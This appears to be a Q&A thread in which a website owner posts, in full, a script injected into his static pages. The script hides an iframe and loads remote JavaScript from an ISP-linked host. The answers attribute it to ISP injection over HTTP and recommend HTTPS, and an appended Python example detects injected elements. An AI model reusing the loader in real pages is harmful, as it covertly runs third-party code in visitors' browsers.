1

I have a static website. I update the web pages locally on my computer, then upload them using FileZilla. Yet, once uploaded, I review the source code of any of my pages and see a script that is injected inside the <head>. The script does not change the layout or visible content of the page, so I do not know what it even does:

<script>
    if (top == window) {
        var engageNameSpace = "engagens";
        "undefined" == typeof window[engageNameSpace] && (window[engageNameSpace] = {}), window[engageNameSpace].engageLoader = function() {
            function e(e) {
                return "undefined" != typeof e && null !== e
            }

            function t() {
                var t = document.createElement("script");
                t.setAttribute("src", s), t.setAttribute("id", "fn_engage_script"), t.setAttribute("async", ""), (null == document.head || e(document.head)) && (document.head = document.getElementsByTagName("head")[0]), document.head.appendChild(t)
            }

            function n() {
                var t = r();
                if (e(t)) {
                    var n = t;
                    i() && (n = d(t));
                    var o;
                    try {
                        o = document.documentElement, o.appendChild(n)
                    } catch (c) {
                        o = document.body, o.appendChild(n)
                    }
                    a()
                }
            }

            function a() {
                function e(e) {
                    var n = e.data;
                    "l8IframeIsReady" === n.message && t()
                }
                window.addEventListener ? window.addEventListener("message", e, !1) : window.attachEvent("onmessage", e)
            }

            function r() {
                var t = document.createElement("iframe");
                if (e(t)) {
                    t.setAttribute("id", "fn_engage"), t.setAttribute("src", u), t.setAttribute("target", "_blank"), t.setAttribute("frameborder", "0");
                    var n = /firefox/i.exec(navigator.userAgent);
                    e(n) && n.length > 0 ? (t.style.height = 0, t.style.width = 0) : t.style.display = "none", t.frameBorder = "no"
                }
                return t
            }

            function i() {
                var t = !1,
                    n = /android (\d+)/i.exec(navigator.userAgent);
                return e(n) && n.length > 0 && (t = parseInt(n[1]) >= 4), t
            }

            function d(e) {
                var t = document.createElement("div");
                return t.setAttribute("id", "fn_wrapper_div"), t.style.position = "fixed", t.style.display = "none", t.ontouchstart = function() {
                    return !0
                }, t.appendChild(e), t
            }

            function o() {
                var t = void 0,
                    a = this,
                    r = function() {
                        e(t) && (window.clearTimeout(t), t = void 0, n.call(a))
                    };
                t = window.setTimeout(r, 1e4), "function" == typeof window.addEventListener ? window.addEventListener("load", r, !1) : window.attachEvent("onload", r)
            }
            var c = "http://globe.moreforme.net",
                u = c + "/l8/EngageService?v=1",
                s = c + "/scripts/Engage.js";
            o()
        };
        var engageLoader = new window[engageNameSpace].engageLoader
    }
</script>

Upon checking the URL in the script, http://globe.moreforme.net, I realize the script is most likely from our ISP (Globe). As I am a novice at internet security, I do not know how the script got there in the first place. My site is static HTML. How can I prevent that script from appearing in the source code once the page is uploaded?

EDIT:

Found this link that appears to be the template code for making the script. Does anybody know what the script does?

JAT86

2 Answers

3

First, this only works because you are on HTTP instead of HTTPS.

Your ISP is injecting this script and then using it to dynamically load another script (in an iframe?).

For whatever reason I can't navigate to globe.moreforme.net which hosts the scripts ... it is redirecting me to globe.moreforme.ph so globe.moreforme.net is most likely only available to people using the ISP.

Now, if I had to take a wild guess ... I would say that the ISP is using this dynamically loaded script to hijack adverts on the pages you visit so as to claim the revenue for themselves.

You should be able to prevent this by either only using HTTPS sites or by using a secure SOCKS5 Proxy (which is stupid simple to set up on a VPS for damn cheap) by looking into Dynamic Port Forwarding in SSH. Alternatively you could look into ShadowSocks if you are in a country that has a country-wide firewall (China).

0

This is the result of Globe Telecom partnering with evil Flash Networks to modify pages their customers are loading by adding their ads and probably hacking other people's ads.

Legality of this is questionable - they should be breaking at least copyright laws. But given the Philippine jurisdiction, I don't think there is anything you can do legally.

This is also the reason why all sites should use HTTPS and disable HTTP (other than redirecting to HTTPS). Today there are multiple ways to get an SSL certificate for your DNS name for free, and it also improves your Google score.
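To check the point both answers make, that the script is added in transit over HTTP and not on the server, one can compare the script and iframe elements in the uploaded file with those in the copy a client receives. This is an added example, not part of the original posts: the function names and the sample HTML are constructed for illustration, and the injected loader is abbreviated.

```python
import hashlib
import re
from html.parser import HTMLParser

WATCHED = {"script", "iframe"}          # elements able to load or run code
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

class ActiveContent(HTMLParser):
    """Fingerprint every <script>/<iframe> element in a page."""
    def __init__(self):
        super().__init__()
        self.items = []     # (tag, src, sha256 of inline body, hosts in body)
        self._open = None   # [tag, src, text chunks] while inside an element

    def handle_starttag(self, tag, attrs):
        if tag in WATCHED:
            self._open = [tag, dict(attrs).get("src"), []]

    def handle_data(self, data):
        if self._open:
            self._open[2].append(data)

    def handle_endtag(self, tag):
        if self._open and tag == self._open[0]:
            name, src, chunks = self._open
            body = "".join(chunks).strip()
            digest = hashlib.sha256(body.encode()).hexdigest() if body else None
            hosts = tuple(sorted(set(HOST_RE.findall(body))))
            self.items.append((name, src, digest, hosts))
            self._open = None

def fingerprints(html):
    parser = ActiveContent()
    parser.feed(html)
    parser.close()
    return set(parser.items)

def injected(local_html, served_html):
    """Elements in the served copy that are absent from the uploaded file."""
    return sorted(fingerprints(served_html) - fingerprints(local_html), key=str)

# Constructed sample: the uploaded file, and the same file as received over
# HTTP with an abbreviated stand-in for the injected loader.
LOCAL = ('<html><head><title>Home</title><script src="/js/site.js"></script>'
         '</head><body><p>Hello</p></body></html>')
SERVED = LOCAL.replace("<head>", '<head><script>if (top == window) {'
                       ' var c = "http://globe.moreforme.net",'
                       ' s = c + "/scripts/Engage.js"; }</script>', 1)

if __name__ == "__main__":
    for tag, src, digest, hosts in injected(LOCAL, SERVED):
        print(tag, src or "(inline)", digest[:12] if digest else "-", hosts)
```

Run against the file on disk and the body fetched over `http://`, then again over `https://`: extra elements that appear only in the HTTP copy point to modification between server and client.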